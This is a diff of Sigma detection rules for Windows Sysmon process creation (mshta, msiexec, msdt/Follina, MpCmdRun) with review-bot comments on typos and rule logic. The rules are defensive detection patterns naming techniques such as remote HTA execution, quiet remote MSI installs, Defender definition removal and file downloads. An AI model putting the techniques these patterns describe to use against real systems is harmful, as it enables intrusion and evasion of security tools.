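Review bot: The comment added to `filter_optional_null_parent` in proc_creation_win_mofcomp_execution.yml attributes the missing parent information to the Microsoft-Windows-Security-Auditing provider, but this rule's logsource is `Channel: Microsoft-Windows-Sysmon/Operational`, so the justification does not describe the events this variant consumes and appears to be carried over from the Security-channel version of the rule. A channel-neutral comment that explains the filter from its own structure would be more accurate, e.g. `# Fallback for events without ParentImage: these cannot match filter_main_wmiprvse, so the same C:\Windows\TEMP\*.mof command line is excluded here without the parent constraint`. It is also worth stating that, because this filter is keyed on CommandLine alone, it suppresses mofcomp launches from any of the `selection_case` parents whenever the MOF file is under C:\Windows\TEMP\, which narrows the detection.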
@@ -1,11 +1,10 @@ title: Potential Mpclient.DLL Sideloading Via Defender Binaries id: 7002aa10-b8d4-47ae-b5ba-51ab07e228b9 related: - - id: 418dc89a-9808-4b87-b1d7-e5ae0cb6effc - type: similar + - id: 418dc89a-9808-4b87-b1d7-e5ae0cb6effc + type: similar status: experimental -description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes - ("MpCmdRun" and "NisSrv") from their non-default directory. +description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool author: Bhabesh Raj diff --git a/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml b/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml index 4ab54d9f9..5b49cafe5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml @@ -22,12 +22,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: MpCmdRun.exe - - Image|endswith: \MpCmdRun.exe - - CommandLine|contains: MpCmdRun.exe - - Description: Microsoft Malware Protection Command Line Utility + - OriginalFileName: MpCmdRun.exe + - Image|endswith: \MpCmdRun.exe + - CommandLine|contains: MpCmdRun.exe + - Description: Microsoft Malware Protection Command Line Utility selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - DownloadFile - url condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml b/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml index e29679485..d1db94675 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml @@ -1,8 +1,7 @@ title: Windows Defender Definition Files Removed id: 9719a8aa-401c-41af-8108-ced7ec9cd75c status: test -description: Adversaries may disable security tools to avoid possible detection of - their tools and activities by removing Windows Defender Definition Files +description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \MpCmdRun.exe - - OriginalFileName: MpCmdRun.exe + - Image|endswith: \MpCmdRun.exe + - OriginalFileName: MpCmdRun.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -RemoveDefinitions' - ' -All' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_msbuild_susp_parent_process.yml b/sigma/sysmon/process_creation/proc_creation_win_msbuild_susp_parent_process.yml index 999230891..c36a1ffe2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msbuild_susp_parent_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msbuild_susp_parent_process.yml @@ -18,8 +18,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \MSBuild.exe - - OriginalFileName: MSBuild.exe + - Image|endswith: \MSBuild.exe + - OriginalFileName: MSBuild.exe filter_parent: ParentImage|endswith: - \devenv.exe 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml index 49ac992b7..c58aba71d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml @@ -1,8 +1,7 @@ title: Potential Arbitrary Command Execution Using Msdt.EXE id: 258fc8ce-8352-443a-9120-8a11e4857fa5 status: test -description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" - binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability +description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability references: - https://twitter.com/nao_sec/status/1530196847679401984 - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ @@ -22,18 +21,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \msdt.exe - - OriginalFileName: msdt.exe + - Image|endswith: \msdt.exe + - OriginalFileName: msdt.exe selection_cmd_inline: - CommandLine|contains: IT_BrowseForFile= + CommandLine|contains: IT_BrowseForFile= selection_cmd_answerfile_flag: - CommandLine|contains: ' PCWDiagnostic' + CommandLine|contains: ' PCWDiagnostic' selection_cmd_answerfile_param: - CommandLine|contains: + CommandLine|contains: - ' /af ' - ' -af ' - condition: process_creation and (selection_img and (selection_cmd_inline or all - of selection_cmd_answerfile_*)) + condition: process_creation and (selection_img and (selection_cmd_inline or all of selection_cmd_answerfile_*)) falsepositives: - Unknown level: high 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_cab_options.yml b/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_cab_options.yml index d5ff3c0b5..06c5705a8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_cab_options.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_cab_options.yml @@ -1,11 +1,10 @@ title: Suspicious Cabinet File Execution Via Msdt.EXE id: dc4576d4-7467-424f-9eee-fd2b02855fe0 related: - - id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3 - type: obsoletes + - id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3 + type: obsoletes status: test -description: Detects execution of msdt.exe using the "cab" flag which could indicates - suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 +description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 references: - https://twitter.com/nas_bench/status/1537896324837781506 - https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab @@ -26,10 +25,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \msdt.exe - - OriginalFileName: msdt.exe + - Image|endswith: \msdt.exe + - OriginalFileName: msdt.exe selection_cmd: - CommandLine|contains: + CommandLine|contains: - ' /cab ' - ' -cab ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_parent.yml index d499b743c..5eb5e326c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msdt_susp_parent.yml 
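Review bot: The folded description of the msdt cab rule still reads "which could indicates suspicious diagcab files"; it should be `which could indicate suspicious diagcab files`. The same kind of carried-over slip is in the description of proc_creation_win_msra_process_injection.yml further down, where "Microsoft Remote Asssistance" should be `Microsoft Remote Assistance`.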
@@ -1,8 +1,7 @@ title: Suspicious MSDT Parent Process id: 7a74da6b-ea76-47db-92cc-874ad90df734 status: test -description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 - / Follina exploitation +description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation references: - https://twitter.com/nao_sec/status/1530196847679401984 - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/ @@ -34,9 +33,10 @@ detection: - \wmic.exe - \wscript.exe - \wsl.exe + # Note: office applications are covered by: 438025f9-5856-4663-83f7-52f878a70a50 selection_msdt: - - Image|endswith: \msdt.exe - - OriginalFileName: msdt.exe + - Image|endswith: \msdt.exe + - OriginalFileName: msdt.exe condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_msedge_proxy_download.yml b/sigma/sysmon/process_creation/proc_creation_win_msedge_proxy_download.yml index 8927a3a5a..8a0da858c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msedge_proxy_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msedge_proxy_download.yml @@ -19,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \msedge_proxy.exe - - OriginalFileName: msedge_proxy.exe + - Image|endswith: \msedge_proxy.exe + - OriginalFileName: msedge_proxy.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_mshta_http.yml b/sigma/sysmon/process_creation/proc_creation_win_mshta_http.yml index 51fd7a973..137ee15af 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mshta_http.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mshta_http.yml 
@@ -1,9 +1,7 @@ title: Remotely Hosted HTA File Executed Via Mshta.EXE id: b98d0db6-511d-45de-ad02-e82a98729620 status: test -description: Detects execution of the "mshta" utility with an argument containing - the "http" keyword, which could indicate that an attacker is executing a remotely - hosted malicious hta file +description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file references: - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html author: Nasreddine Bencherchali (Nextron Systems) @@ -22,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \mshta.exe - - OriginalFileName: MSHTA.EXE + - Image|endswith: \mshta.exe + - OriginalFileName: MSHTA.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// - ftp:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_mshta_inline_vbscript.yml b/sigma/sysmon/process_creation/proc_creation_win_mshta_inline_vbscript.yml index 34d174b47..d237a583b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mshta_inline_vbscript.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mshta_inline_vbscript.yml 
@@ -1,8 +1,7 @@ title: Wscript Shell Run In CommandLine id: 2c28c248-7f50-417a-9186-a85b223010ee status: experimental -description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in - the command, which could indicate a suspicious activity +description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity references: - https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html - https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/ @@ -21,13 +20,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - Wscript. - .Shell - .Run condition: process_creation and selection falsepositives: - - Inline scripting can be used by some rare third party applications or administrators. - Investigate and apply additional filters accordingly + - Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_mshta_javascript.yml b/sigma/sysmon/process_creation/proc_creation_win_mshta_javascript.yml index ef0b75f6b..792446307 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mshta_javascript.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mshta_javascript.yml @@ -20,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \mshta.exe - - OriginalFileName: MSHTA.EXE + - Image|endswith: \mshta.exe + - OriginalFileName: MSHTA.EXE selection_cli: - CommandLine|contains: javascript + CommandLine|contains: javascript condition: process_creation and (all of selection_*) falsepositives: - Unknown 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_mshta_lethalhta_technique.yml b/sigma/sysmon/process_creation/proc_creation_win_mshta_lethalhta_technique.yml index 9327ba644..9697afda7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mshta_lethalhta_technique.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mshta_lethalhta_technique.yml @@ -1,8 +1,7 @@ title: Potential LethalHTA Technique Execution id: ed5d72a6-f8f4-479d-ba79-02f6a80d7471 status: test -description: Detects potential LethalHTA technique where the "mshta.exe" is spawned - by an "svchost.exe" process +description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process references: - https://codewhitesec.blogspot.com/2018/07/lethalhta.html author: Markus Neis diff --git a/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_child_processes.yml index f76dc12f8..692c5219f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_child_processes.yml @@ -1,8 +1,7 @@ title: Suspicious MSHTA Child Process id: 03cc0c25-389f-4bf8-b48d-11878079f1ca status: test -description: Detects a suspicious process spawning from an "mshta.exe" process, which - could be indicative of a malicious HTA script execution +description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution references: - https://www.trustedsec.com/july-2015/malicious-htas/ author: Michael Haag 
@@ -25,27 +24,27 @@ detection: selection_parent: ParentImage|endswith: \mshta.exe selection_child: - - Image|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - \wscript.exe - - \cscript.exe - - \sh.exe - - \bash.exe - - \reg.exe - - \regsvr32.exe - - \bitsadmin.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE - - pwsh.dll - - wscript.exe - - cscript.exe - - Bash.exe - - reg.exe - - REGSVR32.EXE - - bitsadmin.exe + - Image|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - \wscript.exe + - \cscript.exe + - \sh.exe + - \bash.exe + - \reg.exe + - \regsvr32.exe + - \bitsadmin.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE + - pwsh.dll + - wscript.exe + - cscript.exe + - Bash.exe + - reg.exe + - REGSVR32.EXE + - bitsadmin.exe condition: process_creation and (all of selection*) falsepositives: - Printer software / driver installations diff --git a/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_execution.yml index 4649e077a..f1437cb23 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_execution.yml @@ -1,8 +1,7 @@ title: MSHTA Suspicious Execution 01 id: cc7abbd0-762b-41e3-8a26-57ad50d2eea3 status: test -description: Detection for mshta.exe suspicious execution patterns sometimes involving - file polyglotism +description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism references: - http://blog.sevagas.com/?Hacking-around-HTA-files - https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356 
@@ -29,18 +28,19 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \mshta.exe - CommandLine|contains: + CommandLine|contains: - vbscript - .jpg - .png - .lnk + # - '.chm' # could be prone to false positives - .xls - .doc - .zip - .dll + # - '.exe' condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_pattern.yml b/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_pattern.yml index a3e1b78ea..c9dfb7112 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_pattern.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_mshta_susp_pattern.yml @@ -21,9 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \mshta.exe - - OriginalFileName: MSHTA.EXE + - Image|endswith: \mshta.exe + - OriginalFileName: MSHTA.EXE selection_susp: + # Suspicious parents ParentImage|endswith: - \cmd.exe - \cscript.exe 
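Review bot: The newly added disabled entry `# - '.exe'` gives no reason, while the neighbouring `# - '.chm' # could be prone to false positives` does, so a reader tuning this list cannot tell whether `.exe` was left out for the same false-positive concern or is still under evaluation. Suggest `# - '.exe' # disabled: <reason>` with the actual rationale filled in, or drop the dead entry so the list only carries candidates that are documented.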
@@ -32,23 +33,26 @@ detection: - \regsvr32.exe - \rundll32.exe - \wscript.exe - CommandLine|contains: + # Suspicious folders + CommandLine|contains: - \AppData\Local\ - C:\ProgramData\ - C:\Users\Public\ - C:\Windows\Temp\ filter_img: - - Image|startswith: - - C:\Windows\System32\ - - C:\Windows\SysWOW64\ - - CommandLine|contains: - - .htm - - .hta - - CommandLine|endswith: - - mshta.exe - - mshta - condition: process_creation and (all of selection_* or (selection_img and not - filter_img)) + # Filter legit Locations + - Image|startswith: + - C:\Windows\System32\ + - C:\Windows\SysWOW64\ + # Suspicious extensions + - CommandLine|contains: + - .htm + - .hta + # Filter simple execution + - CommandLine|endswith: + - mshta.exe + - mshta + condition: process_creation and (all of selection_* or (selection_img and not filter_img)) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_msiexec_dll.yml b/sigma/sysmon/process_creation/proc_creation_win_msiexec_dll.yml index cdb12d335..ddcdcaaf5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msiexec_dll.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msiexec_dll.yml @@ -21,14 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \msiexec.exe - - OriginalFileName: \msiexec.exe + - Image|endswith: \msiexec.exe + - OriginalFileName: \msiexec.exe selection_flag: - CommandLine|contains: + CommandLine|contains: - ' /z ' - ' -z ' selection_dll: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_msiexec_embedding.yml b/sigma/sysmon/process_creation/proc_creation_win_msiexec_embedding.yml index 696f3c54f..170aa7e77 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msiexec_embedding.yml 
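Review bot: The comment `# Suspicious extensions` sits inside `filter_img`, whose entries are exclusions, so it labels the opposite of what that item does: a command line containing `.htm` or `.hta` is the expected mshta usage and is being removed from the `selection_img and not filter_img` branch, not flagged. Something like `# Filter expected HTA/HTML file arguments` describes the effect, matching the style of the neighbouring `# Filter legit Locations` and `# Filter simple execution` comments. Note that this hunk opens mid-`selection_susp`; the start of that block is in the previous hunk.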
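Review bot: `- OriginalFileName: \msiexec.exe` in `selection_img` of proc_creation_win_msiexec_dll.yml can never match: OriginalFileName comes from the PE version resource and holds a bare file name, not a path, so the leading backslash makes this alternative dead and the rule effectively relies on `Image|endswith` alone. Other rules in this same patch use `OriginalFileName: msiexec.exe` without the backslash (the quiet-install and remote-install rules below), so `- OriginalFileName: msiexec.exe` is the consistent form. The same leading backslash appears in proc_creation_win_msiexec_masquerading.yml and, as `\sqltoolsps.exe`, in proc_creation_win_mssql_sqltoolsps_susp_execution.yml further down; the commit reindents those lines without correcting them.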
+++ b/sigma/sysmon/process_creation/proc_creation_win_msiexec_embedding.yml @@ -1,8 +1,7 @@ title: Suspicious MsiExec Embedding Parent id: 4a2a2c3e-209f-4d01-b513-4155a540b469 status: test -description: Adversaries may abuse msiexec.exe to proxy the execution of malicious - payloads +description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md author: frack113 @@ -29,12 +28,12 @@ detection: - '-Embedding ' filter_splunk_ufw: Image|endswith: :\Windows\System32\cmd.exe - CommandLine|contains: C:\Program Files\SplunkUniversalForwarder\bin\ + CommandLine|contains: C:\Program Files\SplunkUniversalForwarder\bin\ filter_vs: - - CommandLine|contains: \DismFoDInstall.cmd - - ParentCommandLine|contains|all: - - '\MsiExec.exe -Embedding ' - - Global\MSI0000 + - CommandLine|contains: \DismFoDInstall.cmd + - ParentCommandLine|contains|all: + - '\MsiExec.exe -Embedding ' + - Global\MSI0000 condition: process_creation and (selection and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_msiexec_execute_dll.yml b/sigma/sysmon/process_creation/proc_creation_win_msiexec_execute_dll.yml index f6191b9df..1e8b01908 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msiexec_execute_dll.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msiexec_execute_dll.yml 
@@ -1,12 +1,9 @@ title: Suspicious Msiexec Execute Arbitrary DLL id: 6f4191bb-912b-48a8-9ce7-682769541e6d status: test -description: 'Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. - - Msiexec.exe is the command-line utility for the Windows Installer and is thus - commonly associated with executing installation packages (.msi) - - ' +description: | + Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. + Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md 
@@ -27,23 +24,23 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \msiexec.exe - CommandLine|contains: + CommandLine|contains: - ' /y' - ' -y' filter_apple: - CommandLine|contains: + CommandLine|contains: - \MsiExec.exe" /Y "C:\Program Files\Bonjour\mdnsNSP.dll - \MsiExec.exe" /Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll - \MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll - \MsiExec.exe" /Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll - \MsiExec.exe" /Y "C:\Windows\CCM\ - - \MsiExec.exe" /Y C:\Windows\CCM\ + - \MsiExec.exe" /Y C:\Windows\CCM\ # also need non-quoted execution - \MsiExec.exe" -Y "C:\Program Files\Bonjour\mdnsNSP.dll - \MsiExec.exe" -Y "C:\Program Files (x86)\Bonjour\mdnsNSP.dll - \MsiExec.exe" -Y "C:\Program Files (x86)\Apple Software Update\ScriptingObjectModel.dll - \MsiExec.exe" -Y "C:\Program Files (x86)\Apple Software Update\SoftwareUpdateAdmin.dll - \MsiExec.exe" -Y "C:\Windows\CCM\ - - \MsiExec.exe" -Y C:\Windows\CCM\ + - \MsiExec.exe" -Y C:\Windows\CCM\ # also need non-quoted execution condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Legitimate script diff --git a/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_quiet.yml b/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_quiet.yml index b74d808cd..1b4c83238 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_quiet.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_quiet.yml 
@@ -1,12 +1,9 @@ title: Msiexec Quiet Installation id: 79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5 status: experimental -description: 'Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. - - Msiexec.exe is the command-line utility for the Windows Installer and is thus - commonly associated with executing installation packages (.msi) - - ' +description: | + Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. + Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md @@ -26,10 +23,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \msiexec.exe - - OriginalFileName: msiexec.exe + - Image|endswith: \msiexec.exe + - OriginalFileName: msiexec.exe selection_cli: - CommandLine|contains: + # Note that there is no space before and after the arguments because it's possible to write a commandline as such + # Example: msiexec -q/i [MSI Package] + CommandLine|contains: - /i - -i - /package @@ -39,10 +38,11 @@ detection: - /j - -j selection_quiet: - CommandLine|contains: + CommandLine|contains: - /q - -q filter_user_temp: + # The %temp% is a very common location for installers ParentImage|startswith: C:\Users\ ParentImage|contains: \AppData\Local\Temp\ filter_system_temp: diff --git a/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_remote.yml b/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_remote.yml index 6f5eac593..163935ff1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_remote.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msiexec_install_remote.yml 
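Review bot: The new comment in `selection_cli` explains why `/i`, `-i`, `/q`, `-q` carry no surrounding spaces but not the cost: `CommandLine|contains` on `-i` or `-q` matches any argument or path containing those two characters (hyphenated product or directory names, URLs), so `selection_cli` and `selection_quiet` are close to always-true for any msiexec invocation and the rule's precision comes almost entirely from the `filter_*` blocks. Worth extending the comment, e.g. `# Example: msiexec -q/i [MSI Package]. The short forms also match unrelated substrings such as "-i" in paths; precision relies on the filters below`. proc_creation_win_msiexec_install_remote.yml below adds the same comment and has the same property, although there `selection_remote` narrows the match.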
@@ -1,8 +1,8 @@ title: Suspicious Msiexec Quiet Install From Remote Location id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c related: - - id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f - type: similar + - id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f + type: similar status: test description: Detects usage of Msiexec.exe to install packages hosted remotely quietly references: @@ -21,10 +21,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \msiexec.exe - - OriginalFileName: msiexec.exe + - Image|endswith: \msiexec.exe + - OriginalFileName: msiexec.exe selection_cli: - CommandLine|contains: + # Note that there is no space before and after the arguments because it's possible to write a commandline as such + # Example: msiexec -q/i [MSI Package] + CommandLine|contains: - /i - -i - /package @@ -34,11 +36,11 @@ detection: - /j - -j selection_quiet: - CommandLine|contains: + CommandLine|contains: - /q - -q selection_remote: - CommandLine|contains: + CommandLine|contains: - http - \\\\ condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_msiexec_masquerading.yml b/sigma/sysmon/process_creation/proc_creation_win_msiexec_masquerading.yml index b667dde7e..744744198 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msiexec_masquerading.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msiexec_masquerading.yml @@ -19,8 +19,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \msiexec.exe - - OriginalFileName: \msiexec.exe + - Image|endswith: \msiexec.exe + - OriginalFileName: \msiexec.exe filter: Image|startswith: - C:\Windows\System32\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_msiexec_web_install.yml b/sigma/sysmon/process_creation/proc_creation_win_msiexec_web_install.yml index 05adbba82..875f6bdc6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msiexec_web_install.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_msiexec_web_install.yml @@ -1,8 +1,8 @@ title: MsiExec Web Install id: f7b5f842-a6af-4da5-9e95-e32478f3cd2f related: - - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c - type: similar + - id: 8150732a-0c9d-4a99-82b9-9efb9b90c40c + type: similar status: test description: Detects suspicious msiexec process starts with web addresses as parameter references: @@ -24,12 +24,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' msiexec' - :// condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_msohtmed_download.yml b/sigma/sysmon/process_creation/proc_creation_win_msohtmed_download.yml index 6cd340171..124079ba6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_msohtmed_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_msohtmed_download.yml @@ -20,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \MSOHTMED.exe - - OriginalFileName: MsoHtmEd.exe + - Image|endswith: \MSOHTMED.exe + - OriginalFileName: MsoHtmEd.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_mspub_download.yml b/sigma/sysmon/process_creation/proc_creation_win_mspub_download.yml index e770e662c..3ef070d02 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_mspub_download.yml +++ 